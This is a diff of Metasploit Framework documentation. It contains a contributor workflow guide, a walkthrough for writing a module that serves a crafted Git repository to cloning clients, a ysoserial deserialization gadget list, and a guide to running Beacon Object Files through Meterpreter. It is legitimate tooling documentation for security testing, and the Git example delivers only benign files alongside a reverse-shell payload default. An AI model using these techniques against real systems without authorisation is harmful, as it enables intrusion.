+whilst also avoiding some common pitfalls and learning how some of our systems work.
+
+## Initial Steps and Important Notes
+The rest of this guide assumes you have already followed the steps at [Setting Up A Developer Environment](https://r-7.co/MSF-DEV) in order to get
+a fork of Metasploit set up and ready to run, and that you have added in your SSH keys 
+(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)), 
+set up Ruby and optionally the PostgreSQL database, and done any custom shortcuts you wish to configure.
+
+## Getting the Latest Version of Metasploit Framework
+Before making any new contributions, you will want to sure you are running the latest version of Metasploit Framework.
+To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the 
+Rapid7 remote, aka Rapid7's copy of the code. You can verify that `upstream` is set correctly by running `git remote get-url upstream`
+and verifying it is set to `git@github.com:rapid7/metasploit-framework.git`.
+
+Once you run this command, it will check out the `master` branch, then fetch all
+the changes from `upstream` (which should be configured to be Rapid7's copy of Metasploit Framework on GitHub). Once
+it has cached these changes, the `git pull` command will then pull these changes into the current branch, aka `master`.
+
+Not pulling down changes before writing new code could lead to big issues down the line, particularly if someone has edited a file
+you intended to modify. In that case maintainers will then have to try find the right combination of changes to implement, which could lead
+to your PR being rejected if these changes are too complex.
+
+## Making Sure Your Gems Are Updated
+The next step is to make sure you have the latest copy of the Gems that Metasploit Framework depends on. This can be done by running `bundle install`
+from the same directory as where the `Gemfile.lock` file is located, which will be in the same folder as wherever you cloned your fork to locally.
+
+Doing this will allow you to make sure that you are running the latest libraries, which will ensure if you do encounter any bugs whilst
+developing code, those bugs are not related to out of date Gems being installed, and are therefore potentially legitimate bugs that need fixing.
+
+## Creating a New Branch for Your Code
+Once all of this is done, you will want to create a new branch for your code, which can be done by running `git checkout -b <your branch name here>`.
+This will snapshot the current branch that you are on, and use that to create a new branch with the name provided. Note that I did say snapshot. This is
+why it's important to update the current branch's code to the latest version of Metasploit Framework available prior to running this command,
+otherwise the new branch will contain outdated code.
+
+## Adding in Your Changes and Creating Meaningful Commit Messages
+Once you have made your code changes, add them using `git add <path to file to add> <optional path to second file to add>`. Note that you can
+specify multiple files to add using `git add` at the same time.
+
+To commit these changes locally, use `git commit -m "<commit message here>"`. Note that as a general rule of thumb, commit messages should aim
+to be 50 characters or less while telling readers what was changed in that commit. You generally don't want to create commits that do multiple things at once,
+instead create a separate commit for each group of items that you are changing, and make sure that the commit message reflects what changed in a general sense.
+
+Note also that maintainers may end up squashing your commits down so that your commit A, B, and C, now become commit D which
+contains all of the same changes as commit A, B, and C, but in one commit and with one associated commit message. This is often
+done when the code is ready to be landed into Metasploit Framework to help make the commit history easier for people to read.
+
+## Checking for Code Errors
+Before code can be accepted into Metasploit Framework, it must also pass our RuboCop and MsfTidy rules. These help ensure that
+all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards, 
+from the root of wherever you cloned your fork of Metasploit Framework to on disk, run `rubocop <path to your module from current directory>`.
+
+Specifying the `-a` parameter will ask RuboCop to check your module and if possible fix any issues that RuboCop is able to fix.
+In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running 
+this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is 
+complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you 
+want, but it should mention RuboCop as it helps maintainers know what the commit is related to.
+
+As a good practice rule, you should always separate your commits that contain RuboCop changes from those that contain non-RuboCop related changes.
+This helps ensure that when it comes time to review your code, review can proceed a lot quicker and more efficiently.
+
+Note that special cases exist if you are writing library code as our RuboCop rules are primarily designed to be run against modules.
+If at any point you are confused r.e this, please feel free to reach out and ask us for help on Slack at https://metasploit.com/slack.
+
+Once this is done, the next tool to run is located in the root of the Metasploit local fork at `tools/dev/msftidy.rb`. You will want to run this tool
+against your module code (if applicable), using `tools/dev/msftidy.rb <path to module>`. This will give some output if there are any errors, or no output
+if your module passed the tests. Try and fix any errors mentioned here.
+
+## Writing Documentation
+The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information 
+on how to write module documentation at [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html).
+
+In general when writing documentation you will want to search for a similar documentation file under the `documentation`
+folder located in the root of the Metasploit fork. You can then copy one of these files and use it as the basis for writing
+your new documentation for your module.
+
+When writing the information for the documentation, be sure to make sure your installation steps are as clear as possible. Any confusion over
+how to set up the target to be exploited will likely result in delays. You will want to put as much detail here as possible.
+
+Additionally any information about caveats, scenarios you have tested, custom options you added in, or quirks you noticed
+should also go into this file.
+
+## Checking Documentation Syntax
+Once you have written the documentation, you then want to run `toos/dev/msftidy_docs.rb <path to documentation file>`. This will report on any
+errors with your documentation file, which you will want to fix before submitting your PR. Notice however that if you get a warning about long lines,
+these may be okay to ignore depending on the context. A good example is if a line is long merely because of a URL. Such warnings can be
+safely ignored.
+
+## Submitting Your Changes and Opening a PR
+Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which 
+branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this 
+branch's remote URL using `git remote get-url origin`. It should look something like `git@github.com:gwillcox-r7/metasploit-framework`
+with `gwillcox-r7` substituted for your username.
+
+Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch` 
+and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what 
+you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most 
+cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you 
+start working with more complex situations. Note that if the branch pointing to your copy of the code is not named `origin`,
+replace the word `origin` in the command above with the name of the branch that does point to your copy of the code.
+
+This should result in output similar to the following:
+
+```
+> git push origin update_mssql_lib_parameters:update_mssql_lib_parameters
+Enumerating objects: 15, done.
+Counting objects: 100% (15/15), done.
+Delta compression using up to 2 threads
+Compressing objects: 100% (8/8), done.
+Writing objects: 100% (8/8), 1.55 KiB | 1.55 MiB/s, done.
+Total 8 (delta 7), reused 0 (delta 0), pack-reused 0
+remote: Resolving deltas: 100% (7/7), completed with 7 local objects.
+remote: 
+remote: Create a pull request for 'update_mssql_lib_parameters' on GitHub by visiting:
+remote:      https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters
+remote: 
+To github.com:gwillcox-r7/metasploit-framework
+ * [new branch]            update_mssql_lib_parameters -> update_mssql_lib_parameters
+```
+
+To create a new pull request (aka PR), browse to the URL mentioned in this output. In this case for the output above this would
+be `https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters`.
+
+This will open a new template to create a PR request. Please follow all of the directions here and provide the requested details whilst also
+deleting the template text once you have provided the requested information. Note that PRs that do not provide anything but the template text for
+their description will be closed.
+
+In your PR description you should take care to mention what it is that you are submitting, details on the type of vulnerability and CVE-ID,
+if applicable, how to test the submission, as well as any special concerns or items of note that occurred whilst conducting testing.
+
+Once this is done a member of our team will review your PR within a few days and provide feedback on any changes that may still need to be made
+before the submission can be accepted.
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 |Download Link|File Type|SHA1|PGP|
 |-|-|-|-|
-| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
+| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)|
 | [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc)|
 | [metasploit-4.20.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.asc)|
 | [metasploit-4.19.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.asc)|
@@ -29,7 +29,7 @@ Once the serialized object is generated and stored as `java_payload`, it's then
 ### `#generate_java_deserialization_for_payload(name, payload)`
 This method will generate a serialized Java object that when loaded will execute the specified Metasploit payload. The payload will be converted to an operating system command using one of the supported techniques contained within this method and then passed to [`#generate_java_deserialization_for_command`](#generate_java_deserialization_for_commandname-shell-command).
 
- **name** - The payload name parameter must be one of the supported payloads stored in the `ysoserial` cache.  As of this writing, the list includes: `BeanShelll1`, `Clogure`, `CommonBeanutils1`, `CommonsCollections2`, `CommonsCollections3`, `CommonsCollections4`, `CommonsCollections5`, `CommonsCollections6`, `Groovy1`, `Hibernate1`, `JBossInterceptors1`, `JRMPClient`, `JSON1`, `JavassistWeld1`, `Jdk7u21`, `MozillaRhino1`, `Myfaces1`, `ROME`, `Spring1`, `Spring2`, and `Vaadin1`.  While `ysoserial` includes additional payloads that are not listed above, they are unsupported by the library due to the need for complex inputs.  Should there be use cases for additional payloads, please consider opening an issue and submitting a pull request to add support.
+- **name** - The payload name parameter must be one of the supported payloads stored in the `ysoserial` cache.  As of this writing, the list includes: `BeanShelll1`, `Clogure`, `CommonsBeanutils1`, `CommonsCollections2`, `CommonsCollections3`, `CommonsCollections4`, `CommonsCollections5`, `CommonsCollections6`, `Groovy1`, `Hibernate1`, `JBossInterceptors1`, `JRMPClient`, `JSON1`, `JavassistWeld1`, `Jdk7u21`, `MozillaRhino1`, `Myfaces1`, `ROME`, `Spring1`, `Spring2`, and `Vaadin1`.  While `ysoserial` includes additional payloads that are not listed above, they are unsupported by the library due to the need for complex inputs.  Should there be use cases for additional payloads, please consider opening an issue and submitting a pull request to add support.
 
 - **payload** - The payload object to execute on the remote system. This is the native Metasploit payload object and it will be automatically converted to an operating system command using a technique suitable for the target platform and architecture. For example, x86 Windows payloads will be converted using a Powershell command. Not all platforms and architecture combinations are supported. Unsupported combinations will result in a `RuntimeError` being raised which will need to be handled by the module developer.

@@ -169,4 +169,4 @@ DONE!  Successfully generated 0 static payloads and 22 dynamic payloads.  Skippe
 At completion, the `data/ysoserial_payloads.json` file is overwritten and the 22 dynamic payloads are ready for use within the framework.  Afterward, the developer should follow the standard `git` procedures to `add` and `commit` the new JSON file  before generating a pull request and landing the updated JSON into the framework's `master` branch.

 [1]: https://github.com/pimps/ysoserial-modified/blob/e71f70dbc5e8c27d72873014ac5cb7766f4b5b94/src/main/java/ysoserial/payloads/util/CmdExecuteHelper.java#L11-L30
-[2]: https://github.com/rapid7/metasploit-framework/blob/d580e7d12218fbf62b190a0c0c6d25f43b8aa5be/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb
+[2]: https://github.com/rapid7/metasploit-framework/blob/d580e7d12218fbf62b190a0c0c6d25f43b8aa5be/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb
@@ -84,6 +84,10 @@ OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *
 * **conditions** - *optional*, *key-word only* An array of a condition for which the option should be displayed. This
  can be used to hide options when they are irrelevant based on other configurations. See the [Filtering datastore
  options](#Filtering-datastore-options) section for more information.
+* **fallbacks** *optional*, *key-word only* An array of names that will be used as a fallback if the main option name is
+  defined by the user. This is useful in the scenario of wanting specialised option names such as `SMBUser`, but to also
+  support gracefully checking a list of more generic fallbacks option names such as `Username`. This functionality is 
+  currently behind a feature flag, set with `features set datastore_fallbacks true` in msfconsole

 Now let's talk about what classes are available:

@@ -0,0 +1,399 @@
+This page walks through the process of creating an exploit module for vulnerable Git clients.
+
+### Building a Repository
+
+Many of the existing Git exploits in Metasploit rely on being able to host a valid repository that a Git client can successfully clone. So to get started with building an exploit, the contents of the repo need to be decided on first.
+
+Let's say that the repository is something like the following:
+
+```
+space@vm:~/test-repo$ ls -al
+total 20
+drwxrwxr-x  4 space space 4096 Sep 16 14:06 .
+drwxr-x--- 23 space space 4096 Sep 16 14:05 ..
+drwxrwxr-x  2 space space 4096 Sep 16 14:06 dir
+-rw-rw-r--  1 space space   10 Sep 16 14:06 file.txt
+drwxrwxr-x  7 space space 4096 Sep 16 14:06 .git
+space@vm:~/test-repo$ ls -al dir
+total 12
+drwxrwxr-x 2 space space 4096 Sep 16 14:06 .
+drwxrwxr-x 4 space space 4096 Sep 16 14:06 ..
+-rw-rw-r-- 1 space space    5 Sep 16 14:06 test_file.txt
+```
+
+The `.git` directory is the only component of the repository that won't be sent,
+so the repository will consist of the `file.txt`, the `dir` folder, and the `test_file.txt` file that lives within the `dir`  folder. Every file and directory inside the repo is represented as a Git object: File contents are represented as blob objects which get coupled together to form a tree object. Lastly, a commit object is created to hold information about the tree object, including the tree's sha, the author of the commit, a commit message, etc.
+
+There will need to be two tree objects to represent the contents of `dir` and the contents
+of the root of the repository. Starting with the contents of `dir`, a blob object
+needs to be created to represent the contents of `test_file.txt`:
+
+```
+space@vm:~/test-repo$ cat dir/test_file.txt 
+test
+```
+
+The [Git mixin][1] contains the functionality for building a Git object.
+To build a blob object, the `build_blob_object()` class method should be used:
+
+```
+>> contents = "test\n"
+=> "test\n"
+>> blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe163c75cd0                                            
+```
+
+The resulting object will contain the object type, its original contents,
+its compressed contents, its sha, and its path (where the commit object will
+be stored client side). Since this will be the only file in the `dir` folder,
+the tree object can be created with `Msf::Exploit::Git::GitObject.build_tree_object()`.
+A tree object is represented differently, holding information about each file contained
+in the directory, such as file permissions, file name, object type, and the file's sha1 hash.
+Because of that, the `build_tree_object()` expects a hash or an array of hashes,
+where each hash looks like the following:
+
+```
+>> tree_entry =
+{
+	mode: '100644',
+	file_name: 'test_file.txt',
+	sha1: blob.sha1
+}
+```
+
+And using that, the tree object can now be created:
+
+```
+>> tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_entry)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe161b0cd78
+```
+
+Now that the `dir` folder is represented in Git objects, we can represent the root
+of the repository. That just requires creating a `blob` object for `file.txt`,
+creating a `tree` object representing the top-level directory, and finally a commit object.
+
+Again, a blob object needs to be created to represent the contents of the remaining file:
+
+```
+space@vm:~/test-repo$ cat file.txt
+some text
+```
+
+```
+>> contents = "some text\n"
+=> "some text\n"
+>> file_blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe163bf54b8                                              
+...                                                                                            
+```
+
+Then, a new tree object needs to be created to represent the top-level directory,
+which includes `file.txt` and the `dir` folder:
+
+```
+?> entries = [
+?>   {
+?>     mode: '100644',
+?>     file_name: 'file.txt',
+?>     sha1: file_blob.sha1
+?>   },
+?>   {
+?>     mode: '040000',
+?>     file_name: 'dir',
+?>     sha1: tree_object.sha1
+?>   }
+>> ]
+=> [{:mode=>"100644", :file_name=>"file.txt", :sha1=>"b649a9bf89116c581f8329b8ec3c79a86a70...
+>> top_level_obj = Msf::Exploit::Git::GitObject.build_tree_object(entries)
+```
+
+The `build_commit_object()` method takes a hash that expects the sha1 hash for
+the tree created, the sha1 hash for the parent commit if one exists, and optional
+data such as an author name, email address, company name, commit message, etc.
+If the user chooses not to pass in data for the optional data, `Faker` will generate
+random data for them.
+
+```
+>> commit_object = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: top_level_obj.sh
+a1)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe1533ac848                                              
+...                                                                                            
+>> commit_object
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe1533ac848                                              
+ @compressed=                                                                                  
+  "x\x9C\x95\xCEA\x0E\xC2 \x10\x05P\xD7\x9Cb<@\r\x1DZ\xCA\xC2\x18\xE3\xCE\xA8g0XF!\xB6\xD0\x00]x{I\xED\x05\\\xCD\xE4'\xF3\xFE\xF4a\x1C]\x06\x14j\x93#\x11pe\b\el5u]cL#\xD1\x18\xC9\x05\x97\x92\x04*\xF3h\xA5P}\xC7\x89\xE99\xDB\x10\xE1\xEA\x92\xF6&j\xB8\xCC\x93\xD5\x03\xEC\xDF\xCB\xBC\x0Fk~\xB43\ri\xE7)\x1F\xA0\xAEU[\x10l\x05T\x85\xE4\xAC_\xCA3\xFD\xC7\xA8\x0E%\nQ\xE3\xAA\xB0\xB3w\xD9\x95\xA3\x1F\a9@\x98\xC8\xC3\xAB\xEC\x91\xA6\x90\\\x0E\xF1\x03\xCF\xF2\xED\xC9\xF9T\xDD\x82\x8D[\xF6\x05s\xF7P\x89",                                                                       
+ @content=                                                                                     
+  "tree 08de2425ae774dd462dd603066e328db5638c70e\nauthor Lisandra Kuphal <kuphal_lisandra@huels.net> 1185328253 -0300\ncommitter Lisandra Kuphal <kuphal_lisandra@huels.net> 872623312 -0300\n\nInitial commit to open git repository for Bins-Mohr!\n",
+ @path="01/8856fe17403b0991e5d1d3eb7f62dca4d8e951",
+ @sha1="018856fe17403b0991e5d1d3eb7f62dca4d8e951",
+ @type="commit">
+```
+
+That's all that is needed to create a valid repository in Metasploit.
+
+### Hosting the Repository
+
+Metasploit's current implementation of the Git protocol works over HTTP ([SmartHttp docs][3]),
+so to host a malicious repository with Metasploit, the exploit module needs to
+leverage the `Msf::Exploit::Remote::HttpServer` mixin. Additionally,
+the [Git][1] and [Git SmartHttp][2] mixins need to be included to build objects
+and create appropriate responses for the client's requests.
+
+The module should look similar to other exploit modules that use the HttpServer mixin,
+defining an `on_request_uri()` method, a `primer()` method, and an `exploit()` method.
+The `primer()` method is first to execute, so setup for things like the repository uri
+can happen there:
+
+```ruby
+  # Creates a random uri for the Git repo, ensuring that there are no spaces
+  def create_git_uri
+    "/#{Faker::App.name.downcase}.git".gsub(' ', '-')
+  end
+
+  # Uses GIT_URI datastore option or randomly generates a repo URI
+  # Registers the URI with the http server and prints the entire path that client should pass to git clone
+  def primer
+    @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']
+    @git_addr = URI.parse(get_uri).merge(@git_repo_uri)
+    print_status("Git repository to clone: #{@git_addr}")
+    hardcoded_uripath(@git_repo_uri)
+  end
+```
+
+Next, the `exploit()` method can be used to set up the repository.
+The code used in the `Building a Repository` section can be placed here
+before entering the listen / accept loop.
+
+The `on_request_uri()` method is where most of the module logic will live.
+No matter what the client sends, the request should first be parsed
+by `Msf::Exploit::Git::SmartHttp::Request.parse_raw_request()`.
+The `parse_raw_request()` method will format the request so it is easier to work with.
+The first request that a client will send when cloning a repository is a reference
+discovery request. The client will expect things like server capabilities and the
+reference that `HEAD` points to in the response. Since this is a simple repo only one
+branch will exist, so `HEAD` will point to `refs/heads/master` and `refs/heads/master`
+will point to the latest commit in the repo, which in this case is the only commit
+in the repo. This can be represented as the following hash:
+
+```ruby
+refs =
+{
+	'HEAD' => 'refs/heads/master',
+	'refs/heads/master' => commit_object.sha1
+}
+```
+
+Creating a proper response to a `ref-discovery` request is done through
+`Msf::Exploit::Git::SmartHttp.get_ref_discovery_response()`. It takes two parameters:
+The request object from `parse_raw_request()` and the above `refs` hash.
+After the response is built, it can be sent back to the client.:
+
+```ruby
+response = get_ref_discovery_response(request, @refs)
+cli.send_response(response)
+```
+
+If the client successfully receives the `ref-discovery` response,
+it will then send an `upload-pack` request. The `upload-pack` request is a `POST`
+request containing the client's capabilities and a 'want' list for objects in
+the repository. To create a proper response, the `Msf::Exploit::Git::SmartHttp.get_upload_pack_response()`
+method should be used. Again, this method accepts two arguments. The first is the
+parsed request from the client, and the second is an array of all objects that exist
+in the repo. The `get_upload_pack_response()` method will check the sha1 hash of
+each object against the hashes in the want list that the client sent and send only
+the requested object hashes.
+
+```ruby
+response = get_upload_pack_response(request, @git_objs)
+cli.send_response(response)
+```
+
+Upon receiving the `upload-pack` response from the server,
+the client will build out the repository.
+
+Putting it all together, the module should look something like the following:
+
+```ruby
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Git
+  include Msf::Exploit::Git::SmartHttp
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Git Clone Test',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ ],
+        'References' => [ ],
+        'DisclosureDate' => '2022-09-22',
+        'Platform' => [ 'unix' ],
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {}
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])
+      ]
+    )
+
+    deregister_options('RHOSTS', 'RPORT')
+  end
+
+  def exploit
+    setup_repo_structure
+    super
+  end
+
+  def setup_repo_structure
+    # create blob object for contents of 'test_file.txt'
+    contents = "test\n"
+    blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+
+    # create tree object representing 'test_file.txt' in 'dir' folder
+    tree_entry =
+    {
+      mode: '100644',
+      file_name: 'test_file.txt',
+      sha1: blob.sha1
+    }
+    tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_entry)
+
+    # create blob object for contents of 'file.txt'
+    contents = "some text\n"
+    file_blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+
+    # create tree object representing top-level directory of repo
+    entries =
+    [
+      {
+        mode: '100644',
+        file_name: 'file.txt',
+        sha1: file_blob.sha1
+      },
+      {
+        mode: '040000',
+        file_name: 'dir',
+        sha1: tree_object.sha1
+      }
+    ]
+    top_level_obj = Msf::Exploit::Git::GitObject.build_tree_object(entries)
+
+    # create commit
+    commit_object = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: top_level_obj.sha1)
+
+    # create list of objects in repository, as the
+    # client will request them to build the repository
+    @git_objs =
+      [
+        commit_object, top_level_obj, tree_object,
+        file_blob, tree_object, blob
+      ]
+
+    @refs =
+      {
+        'HEAD' => 'refs/heads/master',
+        'refs/heads/master' => commit_object.sha1
+      }
+  end
+
+  def create_git_uri
+    "/#{Faker::App.name.downcase}.git".gsub(' ', '-')
+  end
+
+  def primer
+    @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']
+    @git_addr = URI.parse(get_uri).merge(@git_repo_uri)
+    print_status("Git repository to clone: #{@git_addr}")
+    hardcoded_uripath(@git_repo_uri)
+  end
+
+  def on_request_uri(cli, req)
+    request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)
+    case request.type
+    when 'ref-discovery'
+      response = get_ref_discovery_response(request, @refs)
+      fail_with(Failure::UnexpectedReply, 'Git client did not send a valid ref-discovery request') unless response
+    when 'upload-pack'
+      response = get_upload_pack_response(request, @git_objs)
+      fail_with(Failure::UnexpectedReply, 'Git client did not send a valid upload-pack request') unless response
+    else
+      fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')
+    end
+
+    cli.send_response(response)
+  end
+end
+```
+
+### Running the module
+
+The module will start the http server and print the repo to clone
+
+```
+msf6 > use exploit/multi/http/git_clone_test
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/git_clone_test) > set srvport 9999
+srvport => 9999
+msf6 exploit(multi/http/git_clone_test) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/git_clone_test) > set srvhost 192.168.140.1
+srvhost => 192.168.140.1
+msf6 exploit(multi/http/git_clone_test) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+msf6 exploit(multi/http/git_clone_test) > [*] Started reverse TCP handler on 192.168.140.1:4444 
+[*] Using URL: http://192.168.140.1:9999/MOYuJfC
+[*] Server started.
+[*] Git repository to clone: http://192.168.140.1:9999/y-find.git
+```
+
+Once the repository is cloned, you should expect to see the same contents as the `test-repo` at the beginning of this document:
+
+```
+space@ubuntu:~$ git clone http://192.168.140.1:9999/y-find.git
+Cloning into 'y-find'...
+remote: Enumerating objects: 6, done.
+remote: Counting objects: 100% (6/6), done.
+remote: Compressing objects: 100% (6/6), done.
+remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0
+Unpacking objects: 100% (6/6), 401 bytes | 200.00 KiB/s, done.
+space@ubuntu:~$ cd y-find
+space@ubuntu:~/y-find$ ls -al
+total 20
+drwxrwxr-x  4 space space 4096 Sep 22 12:05 .
+drwxr-x--- 22 space space 4096 Sep 22 12:05 ..
+drwxrwxr-x  2 space space 4096 Sep 22 12:05 dir
+-rw-rw-r--  1 space space   10 Sep 22 12:05 file.txt
+drwxrwxr-x  8 space space 4096 Sep 22 12:05 .git
+space@ubuntu:~/y-find$ cat dir/test_file.txt 
+test
+space@ubuntu:~/y-find$ cat file.txt
+some text
+```
+
+[1]: https://github.com/rapid7/metasploit-framework/blob/b1a6d9d30778bed11276ac8685f88d0a4dc98e19/lib/msf/core/exploit/git.rb
+[2]: https://github.com/rapid7/metasploit-framework/blob/b1a6d9d30778bed11276ac8685f88d0a4dc98e19/lib/msf/core/exploit/git/smart_http.rb
+[3]: https://git-scm.com/docs/http-protocol
@@ -0,0 +1,154 @@
+This guide outlines how to use the Meterpreter `execute_bof` command as provided by the `bofloader` extension. It allows
+a Meterpreter session to execute "Beacon Object Files" or BOF files for short. A BOF is a
+[Common Object File Format][1] (COFF) executable file with an API of standard functions defined in [beacon.h][2].
+
+The `bofloader` extension is only available for the Windows native Meterpreter, i.e. it is unavailable in the Java
+Meterpreter even when running on the Windows platform.
+
+# Execution Environment
+**Warning:** The execution environment is shared with the Meterpreter process. If there is an exception or the BOF
+crashes, the Meterpreter session will die. It is suggested that users invoke this functionality through a dedicated
+session to avoid losing access altogether.
+
+The loader and execution environment are provided by [trustedsec/COFFLoader][3]. The extension is therefor subject to
+the same limitations.
+
+The following functions are unavailable:
+
+* `BeaconDataPtr`
+* `BeaconUseToken`<sup>1</sup>
+* `BeaconRevertToken`<sup>1</sup>
+* `BeaconIsAdmin`
+* `BeaconInjectProcess`
+* `BeaconInjectTemporaryProcess`
+
+<sup>1</sup> The token functions are defined and present, but will only effect the execution of the BOF and not the
+Meterpreter runtime environment.
+
+Currently, there is only one output stream. All output data processed by `BeaconOutput` and `BeaconPrintf` is combined
+into that stream. BOFs should not use this for outputting binary data.
+
+# Usage
+The `bofloader` extension provides exactly one command, through which all of the provided functionality is accessed.
+
+`execute_bof </path/to/bof_file> [Options] -- [BOF Arguments]`
+
+
+
+* `-c` / `--compile` -- Compile the input file (requires mingw).
+* `-e` / `--entry` -- The entry point (default: `go`).
+* `-f` / `--format-string` -- Argument format-string. See details below.
+
+## Compile
+The compile option will use a local mingw instance to compile the input file into a COFF file for execution. The
+standard [beacon.h][2] file will be in the include path automatically. In this case, the input file is treated as a C
+source file instead of compiled data.
+
+## Entry Point
+Once loaded the loader will call the BOF entry point. By default, this value is `go`. The entry point option can change
+it to another valid function to call instead.
+
+## Argument Format-String
+The `execute_bof` command is capable of serializing arguments to be sent to the BOF for execution. The user must define
+the data type of each argument that the BOF file expecting to see. This information would come from either reading the
+BOF's documentation or source code. **Incorrectly specifying the arguments or omitting them entirely can result in the
+BOF crashing and the Meterpreter session dying.**
+
